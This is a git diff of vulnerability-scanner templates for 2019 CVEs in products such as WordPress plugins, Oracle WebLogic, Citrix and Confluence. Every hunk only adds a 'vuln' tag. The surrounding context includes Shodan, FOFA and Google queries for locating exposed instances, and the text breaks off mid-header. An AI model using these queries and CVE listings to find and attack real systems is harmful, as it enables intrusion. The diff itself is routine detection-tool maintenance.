100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -29,7 +29,7 @@ info: vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss,vkev + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index 3bfe35a6567..93b2a850c0e 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: cve2019,cve,metinfo,sqli,vkev + tags: cve2019,cve,metinfo,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index a7e5a51be0e..372a91e13eb 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: cve,cve2019,metinfo,sqli + tags: cve,cve2019,metinfo,sqli,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-17228.yaml b/http/cves/2019/CVE-2019-17228.yaml index 473d7fa95f7..73f2933611c 100644 --- a/http/cves/2019/CVE-2019-17228.yaml +++ b/http/cves/2019/CVE-2019-17228.yaml @@ -26,7 +26,7 @@ info: product: motors_-_car_dealer\,_classifieds_\&_listing framework: wordpress fofa-query: body="wp-content/plugins/motors-car-dealership-classified-listings/" && body="wp-" - tags: cve,cve2019,wp,wordpress,wp-plugin,motors-car-dealership-classified-listings,intrusive,vkev + tags: cve,cve2019,wp,wordpress,wp-plugin,motors-car-dealership-classified-listings,intrusive,vkev,vuln variables: single_name: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-17230.yaml b/http/cves/2019/CVE-2019-17230.yaml index 641817e4fcd..cddf7f48f27 100644 --- a/http/cves/2019/CVE-2019-17230.yaml +++ b/http/cves/2019/CVE-2019-17230.yaml @@ -24,7 +24,7 @@ info: product: onetone framework: wordpress publicwww-query: "/wp-content/themes/onetone" - tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev + tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-17231.yaml b/http/cves/2019/CVE-2019-17231.yaml index 10b407e2bce..84fda519730 100644 --- a/http/cves/2019/CVE-2019-17231.yaml +++ b/http/cves/2019/CVE-2019-17231.yaml @@ -24,7 +24,7 @@ info: product: onetone framework: wordpress publicwww-query: "/wp-content/themes/onetone" - tags: cve,cve2019,wordpress,wp-theme,wp,onetone,xss,intrusive,vkev + tags: cve,cve2019,wordpress,wp-theme,wp,onetone,xss,intrusive,vkev,vuln variables: string: "{{rand_text_numeric(13)}}" diff --git a/http/cves/2019/CVE-2019-17232.yaml b/http/cves/2019/CVE-2019-17232.yaml index f03d3ce0a1b..35a9ff56769 100644 --- a/http/cves/2019/CVE-2019-17232.yaml +++ b/http/cves/2019/CVE-2019-17232.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/ultimate-faqs" shodan-query: http.html:"/wp-content/plugins/ultimate-faqs" fofa-query: body="/wp-content/plugins/ultimate-faqs" - tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,unauth,intrusive,vkev + tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,unauth,intrusive,vkev,vuln variables: question: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-17233.yaml b/http/cves/2019/CVE-2019-17233.yaml index bd7cc6e5f0d..f1564e23113 100644 --- a/http/cves/2019/CVE-2019-17233.yaml +++ b/http/cves/2019/CVE-2019-17233.yaml @@ -23,7 +23,7 @@ info: product: ultimate_faq framework: wordpress publicwww-query: "/wp-content/plugins/ultimate-faqs" - tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,intrusive,vkev + tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 51425aedb87..42f8df71ba5 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: yachtcontrol product: yachtcontrol - tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm,vkev + tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 89ea91aea24..2b5dc99cfbb 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve2019,cve,auth-bypass,login,edb,zabbix + tags: cve2019,cve,auth-bypass,login,edb,zabbix,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index 254f3ff8dc5..4d9260537e6 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: cve,cve2019,metinfo,sqli + tags: cve,cve2019,metinfo,sqli,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 70d5a312ce6..5f092e08c16 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -30,7 +30,7 @@ info: product: artifactory framework: "-" shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" - tags: cve,cve2019,jfrog,default-login,- + tags: cve,cve2019,jfrog,default-login,-,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index d34ea1e6036..daaae34404b 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: kirona product: dynamic_resource_scheduling - tags: cve,cve2019,exposure,edb,packetstorm,kirona,vkev + tags: cve,cve2019,exposure,edb,packetstorm,kirona,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 9dd53b758c9..1bc396b46af 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-868l_b1_firmware - tags: cve,cve2019,dlink,router,disclosure,vkev + tags: cve,cve2019,dlink,router,disclosure,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 496f65065c0..40345350d91 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jnoj product: jiangnan_online_judge - tags: cve2019,cve,jnoj,lfi,vkev + tags: cve2019,cve,jnoj,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 263087e2e8f..be93bd47f68 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast,vkev + tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-17564.yaml b/http/cves/2019/CVE-2019-17564.yaml index 79db7196623..07c471cb56a 100644 --- a/http/cves/2019/CVE-2019-17564.yaml +++ b/http/cves/2019/CVE-2019-17564.yaml @@ -25,7 +25,7 @@ info: vendor: apache product: dubbo fofa-query: app="apache-dubbo" - tags: cve,cve2019,dubbo,apache,deserialization,rce,vkev + tags: cve,cve2019,dubbo,apache,deserialization,rce,vkev,vuln variables: interface: "com.example.TestService" diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index b47d6091613..9c3663433e3 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-maker/ fofa-query: body=/wp-content/plugins/popup-maker/ publicwww-query: "/wp-content/plugins/popup-maker/" - tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic,vkev + tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 0c130f68a78..682cfcc5f64 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -31,7 +31,7 @@ info: product: thinvnc shodan-query: http.favicon.hash:-1414548363 fofa-query: icon_hash=-1414548363 - tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft + tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 34234a17e1a..946f62e8fb3 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"prime infrastructure" fofa-query: title="prime infrastructure" google-query: intitle:"prime infrastructure" - tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco,vkev + tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index a7f885ba912..de92b349464 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mi product: millet_router_3g_firmware - tags: cve2019,cve,lfi,router,mi,xiaomi,vkev + tags: cve2019,cve,lfi,router,mi,xiaomi,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index b411ffe26cd..b888ca91d18 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve,cve2019,openfire,lfi,igniterealtime,vkev + tags: cve,cve2019,openfire,lfi,igniterealtime,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 1914ad3b2bf..ca659f99683 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve,cve2019,ssrf,openfire,oast,igniterealtime,vkev + tags: cve,cve2019,ssrf,openfire,oast,igniterealtime,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index 8bdd8faf98b..c44777d6ada 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: secudos product: domos - tags: cve,cve2019,domos,lfi,secudos + tags: cve,cve2019,domos,lfi,secudos,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 89d3df76a90..7178e03ceca 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: strapi product: strapi - tags: cve,cve2019,strapi,auth-bypass,intrusive,edb,vkev + tags: cve,cve2019,strapi,auth-bypass,intrusive,edb,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index 00c5ae96678..d799ac557b1 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: alliedtelesis product: at-gs950\/8_firmware - tags: cve,cve2019,packetstorm,seclists,allied,lfi,alliedtelesis + tags: cve,cve2019,packetstorm,seclists,allied,lfi,alliedtelesis,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-18952.yaml b/http/cves/2019/CVE-2019-18952.yaml index 029b7791067..0651ea4e4c3 100644 --- a/http/cves/2019/CVE-2019-18952.yaml +++ b/http/cves/2019/CVE-2019-18952.yaml @@ -25,7 +25,7 @@ info: vendor: sibsoft product: xfilesharing shodan-query: html:"/?op=registration" "OpenSSL" - tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev + tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index cbffbb7c33b..96695846586 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_library - tags: cve,cve2019,microstrategy,packetstorm,xss,seclists + tags: cve,cve2019,microstrategy,packetstorm,xss,seclists,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 0409c976332..1ccc53642ef 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -29,7 +29,7 @@ info: product: rv110w_firmware shodan-query: http.favicon.hash:"-646322113" fofa-query: icon_hash="-646322113" - tags: cve,cve2019,cisco,router,iot + tags: cve,cve2019,cisco,router,iot,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 5b4d99d6445..04b64dbdb07 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -28,7 +28,7 @@ info: vendor: heroplugins product: hero_maps_premium framework: wordpress - tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins + tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index d31a2a03a99..b3b68939198 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: maxum product: rumpus - tags: cve,cve2019,xss,ftp,packetstorm,maxum + tags: cve,cve2019,xss,ftp,packetstorm,maxum,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-19411.yaml b/http/cves/2019/CVE-2019-19411.yaml index d44bce4b9aa..40c19566fb8 100644 --- a/http/cves/2019/CVE-2019-19411.yaml +++ b/http/cves/2019/CVE-2019-19411.yaml @@ -22,7 +22,7 @@ info: vendor: huawei product: usg9500 shodan-query: title:"HUAWEI" - tags: cve,cve2019,huawei,firewall,lfi + tags: cve,cve2019,huawei,firewall,lfi,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 613784e6d81..603589afbcb 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -30,7 +30,7 @@ info: product: sg200-50_firmware shodan-query: "/config/log_off_page.htm" censys-query: "services.http.response.headers.location: /config/log_off_page.htm" - tags: cve,cve2019,redirect,cisco + tags: cve,cve2019,redirect,cisco,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 69765a2cf3c..522edcb3364 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2019,lfi,kev,packetstorm,citrix,vkev + tags: cve,cve2019,lfi,kev,packetstorm,citrix,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index b45e9e994ad..73abd0134d3 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: totolink product: a3002ru_firmware - tags: cve,cve2019,totolink,rce,router,vkev + tags: cve,cve2019,totolink,rce,router,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index c6a8f0a178f..601ddb16a51 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -30,7 +30,7 @@ info: vendor: ciprianmp product: phpmychat-plus google-query: inurl:"/plus/pass_reset.php" - tags: cve2019,cve,phpMyChat,xss,ciprianmp + tags: cve2019,cve,phpMyChat,xss,ciprianmp,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index bda3b48dd7c..acc7d2f5a50 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -28,7 +28,7 @@ info: vendor: icegram product: email_subscribers_\&_newsletters framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram,vkev + tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 0ddf87b4104..3bc75b4bad9 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: tvt product: nvms-1000_firmware - tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt,vkev + tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index e15dcfb721e..9943d7969af 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -26,7 +26,7 @@ info: vendor: laborator product: neon framework: wordpress - tags: cve2019,cve,xss,laborator,wordpress + tags: cve2019,cve,xss,laborator,wordpress,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 4ab7928ee22..781944a3154 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: employee_records_system_project product: employee_records_system - tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project + tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index d8f2d9e7c88..61352119b28 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -29,7 +29,7 @@ info: vendor: cththemes product: citybook framework: wordpress - tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes + tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index b2507965e03..1d2fc5b9d77 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica + tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-20504.yaml b/http/cves/2019/CVE-2019-20504.yaml index b34f3476120..9fe23d7a2b1 100644 --- a/http/cves/2019/CVE-2019-20504.yaml +++ b/http/cves/2019/CVE-2019-20504.yaml @@ -24,7 +24,7 @@ info: vendor: quest product: kace_systems_management shodan-query: html:"K1000 Logo" - tags: cve,cve2019,k1000,kace,rce,vkev + tags: cve,cve2019,k1000,kace,rce,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 62cc21cd387..fd19fdd0344 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -33,7 +33,7 @@ info: - influxdb fofa-query: title="influxdb - admin interface" google-query: intitle:"influxdb - admin interface" - tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata,vkev + tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-25141.yaml b/http/cves/2019/CVE-2019-25141.yaml index ad16efe0d44..b5c47ed3581 100644 --- a/http/cves/2019/CVE-2019-25141.yaml +++ b/http/cves/2019/CVE-2019-25141.yaml @@ -25,7 +25,7 @@ info: product: easy_wp_smtp framework: wordpress publicwww-query: "/wp-content/plugins/easy-wp-smtp/" - tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive,vkev + tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive,vkev,vuln variables: filename: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-25152.yaml b/http/cves/2019/CVE-2019-25152.yaml index 18d51a24fdf..05144cd70c0 100644 --- a/http/cves/2019/CVE-2019-25152.yaml +++ b/http/cves/2019/CVE-2019-25152.yaml @@ -29,7 +29,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/woocommerce-abandoned-cart/" shodan-query: http.html:"/wp-content/plugins/woocommerce-abandoned-cart/" - tags: cve,cve2019,wpscan,wordpress,wp,wp-plugin,woocommerce-abandoned-cart,xss,passive,vkev + tags: cve,cve2019,wpscan,wordpress,wp,wp-plugin,woocommerce-abandoned-cart,xss,passive,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index 57975d26a38..4b915673e78 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: webcenter_sites - tags: cve,cve2019,oracle,wcs,auth-bypass + tags: cve,cve2019,oracle,wcs,auth-bypass,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index ad8f3f528ae..300e7eabb11 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: webcenter_sites - tags: cve,cve2019,oracle,wcs,sqli + tags: cve,cve2019,oracle,wcs,sqli,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index cc5b7e99273..8bee9f08c40 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oracle product: business_intelligence_publisher - tags: cve,cve2019,oracle,lfi,vkev + tags: cve,cve2019,oracle,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index ec761dcf9f4..0c43d48e84c 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oracle product: business_intelligence_publisher - tags: cve,cve2019,oracle,xxe,oast,kev,edb,vkev + tags: cve,cve2019,oracle,xxe,oast,kev,edb,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index e335c1a3e64..92a20d29417 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: agile_plm - tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce,vkev + tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 750acb7fbf8..6e4f177448d 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: oracle product: communications_diameter_signaling_router - tags: cve,cve2019,oracle,rce,weblogic,vkev + tags: cve,cve2019,oracle,rce,weblogic,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 109414d6f8d..07b8d72368f 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oracle product: bi_publisher - tags: cve,cve2019,edb,oracle,xxe,oast,vkev + tags: cve,cve2019,edb,oracle,xxe,oast,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index b31e8425ebb..db2da118dd6 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -29,7 +29,7 @@ info: - http.component:"Atlassian Confluence" - cpe:"cpe:2.3:a:atlassian:confluence" - http.component:"atlassian confluence" - tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm,vkev + tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 017d733da4f..714012bf03c 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:confluence" - tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev,vkev + tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev,vkev,vuln variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index d9ae4fc0d9c..e78aec3e80b 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -28,7 +28,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,jira,atlassian,exposure + tags: cve,cve2019,jira,atlassian,exposure,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index eb47fe1216d..ae20d9e1c8f 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -34,7 +34,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,xss + tags: cve,cve2019,atlassian,jira,xss,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 325c1ea80e3..11837bda546 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -32,7 +32,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,enumeration + tags: cve,cve2019,atlassian,jira,enumeration,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 0b24885e04f..9451d992e3e 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_config - tags: cve,cve2019,lfi,vmware + tags: cve,cve2019,lfi,vmware,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 584b822669d..06cf35339c9 100644 --- 